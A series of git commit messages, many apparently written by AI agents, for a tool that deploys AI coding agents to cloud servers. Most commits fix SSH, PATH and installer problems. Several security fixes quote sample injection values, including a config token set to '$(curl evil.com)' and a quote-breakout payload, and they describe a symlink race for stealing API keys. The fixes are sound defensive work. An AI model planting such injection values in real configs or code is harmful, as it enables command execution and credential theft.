* fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing
n installs Node.js v22 to /usr/local/bin/node but apt's v18 at
/usr/bin/node can shadow it in non-interactive SSH sessions. After
n 22, symlink the new binaries over the apt ones so v22 is always
resolved. Also fix hcloud CLI token extraction for new TOML format.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review, add curl timeouts to trigger workflows
- Fix ssh_run_server command injection concern: use single-quoted
path_prefix so $HOME/$PATH expand remotely, not locally
- Add --connect-timeout 15 --max-time 30 to trigger workflows to
prevent 5-min hangs when server streams responses
- Handle 409 (dedup) as success — expected when cron fires every 15min
but cycles take 35min
- Reduce workflow timeout-minutes from 5 to 2
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.
Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.
Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: update aider/gptme/interpreter assertions from pip to uv
The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).
Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* ci: trigger test run for uv assertion fix
* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds
- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
$escaped_cmd that prevented the remote shell from consuming escapes,
breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
where it escaped shell operators into literal characters since daytona exec
has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add --pty to fly ssh console for interactive sessions
fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.
Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.
Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.
Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* feat: add QA upgrade — macOS compat linter, per-agent mock assertions
Layer 1: macOS compat linter (test/macos-compat.sh)
- 12 rules (MC001–MC012) catching bash 3.2 incompatibilities
- Detects: base64 -w0 file args, non-portable echo flags, source <(),
((var++)), read -d, nounset flag, sed -i, date %N, local -n,
declare -A, ${var,,}, and |&
- Added to CI lint.yml in warn-only mode for burn-in
- Integrated as Phase 0.5 in qa-dry-run.sh
Layer 2: Per-agent mock assertions
- test/fixtures/_shared_agent_assertions.sh with install checks
for all 15 agents (claude, openclaw, aider, goose, etc.)
- Integrated into test/mock.sh via _run_agent_assertions()
Also includes branch fixes:
- Fix base64 -w0 to use stdin redirect (aws, daytona, fly)
- Fix fly/openclaw to use npm install instead of broken curl|bash
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add E2E test harness and integrate into QA pipeline
Add test/e2e.sh — a full E2E test harness that provisions real servers,
installs agents, and verifies setup across all clouds. Features:
- Smoke test (one canary agent per cloud) and full matrix modes
- Credential auto-detection for 8 clouds
- Per-cloud preflight validation (sequential) then parallel agent tests
- Stale server cleanup, timing history, cross-cloud comparison
- Auto-fix and optimization phases via Claude agents
- macOS bash 3.2 compatible
Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh:
- Runs after mock tests pass, gated on cloud credentials
- Phase 5b auto-fixes failures using per-agent worktree branches
- Parses results and includes in QA summary
Also fixes:
- shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read()
- aws/lib/common.sh: fix SSH key import (use cat instead of base64,
handle race condition on concurrent imports)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* security: prevent command injection in key-request.sh env var loading
Fixes#1405
**Why:**
The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json
without validating the value for shell metacharacters. If an attacker could write
malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected
commands would execute when the variable was later used in unquoted contexts.
**Changes:**
- Added regex validation in _try_load_env_var (line 88-91) to reject values
containing shell metacharacters: ; ' " < > | & $ ` \ ( )
- Matches the same pattern used in validate_api_token() from shared/common.sh
- Now returns error and logs security warning if malicious characters detected
**Impact:**
Blocks command injection attacks via config file poisoning. API tokens must now
be clean alphanumeric strings (as they should be from legitimate providers).
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: strengthen key-request.sh regex to block all shell metacharacters
Address security review feedback from PR #1415.
**Changes:**
- Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$`
- Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters
- Update comment to clarify defense-in-depth purpose
- Change error message to match validate_api_token() pattern
**Why whitelist approach:**
API tokens from legitimate cloud providers only contain alphanumeric
characters plus safe chars (-, _, ., /, @). Whitelist is more robust
than trying to enumerate all dangerous shell metacharacters.
-- pr-maintainer
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix medium severity findings from scan #763
Addresses remaining medium-severity security findings from issue #763:
1. **Path traversal in invalidate_cloud_key** (shared/key-request.sh)
- Removed dots from provider name validation regex
- Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$
- Prevents path traversal via sequences like "foo..bar"
2. **Background process timeout** (shared/key-request.sh)
- Wrapped fire-and-forget key request in timeout 15s
- Prevents leaked subprocess if curl hangs beyond --max-time
3. **Rate limiting IP spoofing** (.claude/skills/setup-agent-team/key-server.ts)
- Switched from x-forwarded-for header to server.requestIP(req)
- Uses actual connection IP instead of spoofable header
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add macOS portability for timeout command
Address review feedback from security team - timeout command is not available
on macOS by default. Added fallback pattern that:
- Uses timeout on Linux (prevents subprocess leak)
- Falls back to curl --max-time only on macOS
This ensures request_missing_cloud_keys() works on both platforms.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix command injection vulnerability in key-request.sh
Fixes the critical command injection vulnerability identified in security review.
Changes:
- Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c
- Pass variables via -- delimiter to prevent shell escaping issues
- Replace echo with printf for proper formatting (macOS bash 3.x compat)
- Maintain timeout wrapper on Linux and curl --max-time fallback on macOS
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements spawn name feature (#1372) to improve UX:
- Add optional spawn name prompt in interactive mode
- Pass spawn name via SPAWN_NAME env var to shell scripts
- Shell scripts use spawn name as default for resource names
- Store spawn name in history for future reference
- Bump CLI version to 0.4.0
The spawn name is prompted before agent/cloud selection and
automatically used as the default for platform-specific resource
names (server name on Hetzner, sprite name on Sprite, etc.).
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: re-prompt on taken Fly.io app names + timeout run_server
Two fixes for Fly.io UX:
1. When app name is globally taken by another user, re-prompt instead
of failing. Returns exit code 2 from _fly_create_app so create_server
can loop with a new name.
2. run_server now has a 5-minute timeout (portable, no coreutils needed)
to prevent indefinite hangs like the 3-hour SSH session stall.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: wait for SSH before installing tools on Fly.io
The previous wait_for_cloud_init immediately ran apt-get via fly ssh
console on a machine that wasn't SSH-reachable yet, causing indefinite
hangs. Now:
1. _fly_wait_for_ssh polls with a 30s-timeout echo until SSH responds
2. Shows progress at each step instead of suppressing all output
3. Each run_server call has an explicit timeout (10min for apt, 2min
for bun, 30s for PATH exports)
4. Retries package install once on timeout
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: run fly ssh console in foreground, not background
fly ssh console breaks when backgrounded with & — it needs a foreground
process to establish the connection. Reverted to foreground execution
and use timeout/gtimeout when available (Linux/CI). On macOS where
timeout isn't available, the user can Ctrl+C hung commands.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: ensure bun PATH is available in non-interactive fly ssh sessions
Ubuntu's default .bashrc returns early for non-interactive shells,
so "source ~/.bashrc && bun install -g openclaw" silently fails —
the PATH line at the bottom of .bashrc is never reached.
Fix by prepending ~/.bun/bin to PATH in run_server() so all remote
commands have access to tools installed during wait_for_cloud_init.
Also fix spawn_agent to explicitly handle agent_install failure
instead of relying on set -e (which exits silently).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: validate saved API tokens before use
Tokens loaded from config files (e.g. ~/.config/spawn/fly.json) were
never validated, so expired or revoked tokens would silently pass through
and only fail at the point of use (e.g. app creation). Now the provider's
test function runs on config-file tokens too, falling through to a fresh
prompt if validation fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle FlyV1 token auth scheme for Fly.io Machines API
Fly.io dashboard tokens use the format "FlyV1 fm2_..." where "FlyV1" is
the authorization scheme itself, not a Bearer token prefix. The script was
always sending "Authorization: Bearer FlyV1 fm2_..." which the API rejects
with "token validation error". Now detects FlyV1-prefixed tokens and sends
them as "Authorization: FlyV1 fm2_..." using custom auth headers.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: make refactor service actually run reliably
Three fixes for the refactor workflow that was producing zero PRs:
1. community-coordinator: Gemini → Sonnet — Gemini doesn't support
the Task tool, causing a respawn on every single cycle
2. Monitoring loop: replace "sleep 5" (which drifted to sleep 30)
with explicit short-sleep instructions and CRITICAL rule that
every turn must include a tool call to stay alive
3. Lifecycle management: explicit shutdown sequence with retry,
preventing early exit that orphans teammates
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes#1354 - users experienced a ~30s delay with "gateway not connected"
errors when trying to use OpenClaw immediately after launch.
Root cause: gateway takes time to bind to port 18789, but TUI launched
after only 2 seconds.
Solution: Add wait_for_openclaw_gateway() helper that polls the gateway
port (max 30s) before launching TUI, ensuring immediate usability.
Changes:
- shared/common.sh: Add wait_for_openclaw_gateway() function
- All openclaw.sh scripts (10 files): Replace sleep 2 with gateway readiness check
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Make install_agent() check exit codes and fail fast when installation
commands return non-zero. Previously, the function would silently
continue even when installations failed due to bash || operators
returning 0.
This fix ensures that installation failures (network timeouts, missing
dependencies, package not found) are caught immediately with actionable
error messages instead of confusing runtime errors during session launch.
Affected ~30 agent scripts using patterns like:
- pip install X 2>/dev/null || pip3 install X
- command -v bun && bun install X || npm install X
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three reliability improvements:
1. OAuth session cleanup: Verify PID still exists before killing to prevent
accidentally killing unrelated processes if PID is reused by the OS.
Uses kill -0 check before sending SIGTERM.
2. Float arithmetic fallback: Check for python3 availability before using it
for fractional POLL_INTERVAL support. Falls back to integer seconds with
explicit comment about potential early timeout.
3. Exit code preservation: Add clarifying comment about exit code capture
timing in refactor.sh cleanup trap (already correct, now documented).
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add error logging to empty catch blocks in test helpers
Previously, test helper functions had 14 empty catch blocks that
silently swallowed all errors during cleanup operations (reading and
deleting temporary stderr files).
This change adds error logging that:
- Allows expected errors (ENOENT for missing files, exit code 1 for cat)
- Logs unexpected errors to console for debugging
This improves test reliability by surfacing unexpected filesystem or
permission errors that could indicate real problems, while still
allowing the intended best-effort cleanup behavior.
Fixes: Empty catch blocks in 6 test files
Impact: Better test debugging and error visibility
Agent: code-health
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: improve error handling in Python fallback and directory deletion
1. Python arithmetic fallback (shared/common.sh:713):
- Changed from: || echo "$((elapsed + 1))"
- Changed to: explicit if/else with error detection
- Impact: Python errors are now properly caught instead of masked by ||
2. Unvalidated directory deletion (cli/install.sh:142):
- Added path validation before rm -rf
- Checks: path is within dest directory AND directory exists
- Impact: Prevents accidental deletion if variables are malformed
Both changes improve safety and error visibility without breaking
existing functionality.
Agent: code-health
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Prevents potential code injection if malicious parameters containing
single quotes are passed to _generate_oauth_server_script(). The
function embeds bash variables directly into a Node.js script string
using single-quoted JS strings. Without escaping, a crafted parameter
like "foo'; malicious(); '" could break out of the string context.
While current callers use safe values (randomUUID, tempfile paths,
HTML constants), defense-in-depth requires sanitizing at the point
of use to prevent future regressions if callers change.
Fixes: CWE-94 (Code Injection)
Severity: HIGH
Impact: Remote code execution if attacker controls OAuth state token,
file paths, or HTML content
Agent: security-auditor
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Refactored two high-complexity functions to improve maintainability:
1. shared/common.sh: Extract install_claude_code() into 5 focused helpers:
- _finalize_claude_install: Setup shell integration
- _verify_claude_installed: Check if installation succeeded
- _install_via_curl: Curl installer method
- _ensure_nodejs_runtime: Node.js runtime setup
- _install_via_bun: Bun installer method
Main function now reads as a clear sequence of steps.
2. cli/src/commands.ts: Simplify credential checking in printQuickStart:
- Extract checkAllCredentialsReady() for clarity
- Extract printAuthVariableStatus() to handle auth var display
- Extract buildCloudCommandHint() for cloud hint formatting
Reduces complexity and improves readability.
All 80 tests pass. No functional changes.
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Improves codebase reliability by adding critical safety validations:
1. **cleanup_oauth_session**: Added path validation before rm -rf
- Prevents accidental deletion if oauth_dir is empty, /, or /tmp
- Validates path starts with /tmp/ and is not just /tmp itself
- Prevents catastrophic system damage from failed mktemp
2. **_init_oauth_session**: Added mktemp failure detection
- Checks if mktemp -d succeeded before using oauth_dir
- Returns error with actionable message if temp dir creation fails
- Prevents empty oauth_dir from propagating to rm -rf
3. **refactor.sh SPAWN_ISSUE validation**: Strengthened regex
- Changed from ^[0-9]+$ to ^[1-9][0-9]*$
- Prevents SPAWN_ISSUE="0" from creating issue-0 worktrees
- Ensures issue numbers are positive integers (>= 1)
These fixes prevent potential data loss from edge cases in OAuth
cleanup and refactor service issue handling.
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
HIGH severity: Three functions used hardcoded /tmp/env_config for uploading
API keys, creating a TOCTOU race condition where attackers on multi-user
systems could create symlinks to exfiltrate OPENROUTER_API_KEY and other
credentials.
Fixed by using unpredictable temp file names with mktemp-derived randomness,
matching the secure pattern in write_remote_file_via_callback().
Affected functions:
- inject_env_vars_with_ssh() (line 1094)
- inject_env_vars_local() (line 1128)
- inject_env_vars_cb() (line 1363)
Agent: security-auditor
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
- Fix race condition in cleanup_oauth_session: Kill process group to prevent zombie OAuth server processes
- Add mktemp failure handling in _init_oauth_session: Prevents undefined behavior when /tmp is full or inaccessible
- Add env var name validation in generate_env_config: Prevents shell injection via malformed KEY=value pairs
Agent: code-health
Co-authored-by: test-engineer <agent@spawn.local>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Wire up connection tracking across all 10 clouds so users can reconnect
to and delete previously spawned servers via `spawn list` and `spawn delete`.
Phase 1 - Connection tracking:
- Extend save_vm_connection() with cloud and metadata params
- Add save_vm_connection to create_server() in all cloud libs
- Extend VMConnection with cloud, deleted, deleted_at, metadata fields
Phase 2 - Delete via interactive picker:
- Add "Delete this server" option to spawn list picker
- Build delete scripts that reuse each cloud's destroy_server()
- Confirmation UX with spinner feedback
- Soft-delete marking in history (deleted records show [deleted])
Phase 3 - Standalone delete command:
- spawn delete (aliases: rm, destroy) with interactive picker
- Filter support: spawn delete -a <agent> -c <cloud>
Also improves reconnect hints for Fly (fly ssh console) and
Daytona (daytona ssh) connections.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Ubuntu's default .bashrc has an interactive-shell guard that exits
early in non-interactive contexts. When SSH runs a command string
(ssh -t user@host -- "cmd"), the shell is non-interactive, so
env vars appended to .bashrc are never loaded — causing Claude Code
to start without OpenRouter credentials and get rejected.
Fix: write env vars to ~/.spawnrc and have .bashrc/.zshrc source it.
Launch commands source ~/.spawnrc directly, bypassing the guard.
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The npm/fnm fallback was causing multiple issues:
- bun installed claude but verification ran `claude --version` which
needs node (bun-installed claude has #!/usr/bin/env node shebang)
- fnm's `eval "$(fnm env)"` corrupts PATH when written to rc files
- fnm installs node in a dir that requires eval to access
Simplified to two methods:
1. curl installer (standalone binary, no runtime needed)
2. bun i -g (installs to ~/.bun/bin/)
Removed: npm method, fnm/nodesource node installers, fnm PATH logic.
Changed verification from `command -v claude && claude --version` to
just `command -v claude` (avoids needing node just to verify).
Also: cleaned up claude_path (removed fnm references), kept stale
.bash_profile cleanup.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Root cause: the launch command did `source ~/.bashrc; source ~/.zshrc; claude`.
The .zshrc contains `eval "$(fnm env)"` which outputs PATH with literal
"$PATH" in quotes instead of expanding it, destroying the entire PATH.
Confirmed via debugging:
- `ssh -t ... 'export PATH=...; which claude'` → works (/root/.bun/bin/claude)
- `ssh -t ... 'export PATH=...; source ~/.zshrc; which claude'` → "command not found"
- `source ~/.zshrc; echo $PATH` → `"/run/user/0/fnm_multishells/...":"$PATH"` (broken)
Fix:
- Remove `source ~/.bashrc` and `source ~/.zshrc` from ALL launch commands
- ssh -t creates a pseudo-terminal, so bash auto-sources .bashrc for env vars
- Explicit PATH export is all we need for finding the claude binary
- Remove fnm eval snippet from _finalize_claude_install (it poisoned rc files)
- Also: clean up stale ~/.bash_profile, fix cloud-init PATH, move node
install after bun attempt
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Stop writing env vars to ~/.profile and ~/.bash_profile — only write to
.bashrc and .zshrc. The .profile approach caused issues because login
shells source it inconsistently across distros, and creating .bash_profile
makes bash -l skip .profile entirely.
Replace `bash -lc claude` launch commands with explicit PATH export +
source pattern across all cloud providers. This ensures claude is found
regardless of shell initialization quirks.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
On Ubuntu/Debian, ~/.bash_profile doesn't exist by default. When bash
starts as a login shell (bash -l), it sources the FIRST file it finds
from: ~/.bash_profile, ~/.bash_login, ~/.profile. Since only ~/.profile
exists, that's what gets sourced — and ~/.profile sets up the standard
PATH (/usr/bin, /bin, etc.) and sources ~/.bashrc.
Our inject_env_vars_* functions and _finalize_claude_install were writing
to ~/.bash_profile and ~/.zprofile (either via touch+append or via
for-loop over all rc files). Creating ~/.bash_profile caused bash -l to
source it INSTEAD of ~/.profile, completely losing the standard PATH
setup. After deployment, even basic commands like `ls` would fail.
Fix: Only write to ~/.profile, ~/.bashrc, ~/.zshrc across all clouds
(shared, fly, sprite). These are the standard files that work correctly
on all Linux distros without breaking the shell initialization chain.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>